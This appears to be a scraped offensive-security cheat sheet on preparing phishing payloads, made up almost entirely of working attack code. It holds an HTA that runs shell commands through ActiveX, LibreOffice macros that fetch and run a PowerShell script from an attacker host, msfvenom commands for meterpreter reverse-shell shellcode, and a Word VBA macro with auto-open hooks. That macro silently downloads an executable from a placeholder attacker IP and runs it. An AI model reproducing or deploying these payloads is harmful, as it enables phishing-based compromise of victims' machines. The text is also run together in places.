Prepare for phishing payload
# simple ping
<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("ping -n 3 10.10.x.y");
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
Last updated
Tools > Macros > Organize Macro > Basic
[Basic Macros]
Untitled 1 > New > (give a name)Sub Main
Shell("cmd /c powershell iwr http://<ip attacker>/shell.ps1 -o C:/Windows/Tasks/shell.ps1")
Shell("cmd /c powershell C:/Windows/Tasks/shell.ps1")
End Sub> Macro... > (choose last macro)make sure specify the Macros in to the current document.View > Macros
[Basic Macros]
"MyMacro" > Createmsfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw > shellcode.raw.\BadAssMacrosx64.exe -i shellcode.raw -s indirect -p no -w doc -o out.txtSub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
Sub MyMacro()
Dim str As String
str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://<ATTACKER IP>/testing.exe', 'C:\Windows\Tasks\testing.exe')"
Dim exePath As String
exePath = "C:\Windows\Tasks\" + "testing.exe"
Shell str, vbHide
Wait (3)
Shell exePath, vbHide
End Sub
Sub Wait(n As Long)
Dim t As Date
t = Now
Do
DoEvents
Loop Until Now >= DateAdd("s", n, t)
End Sub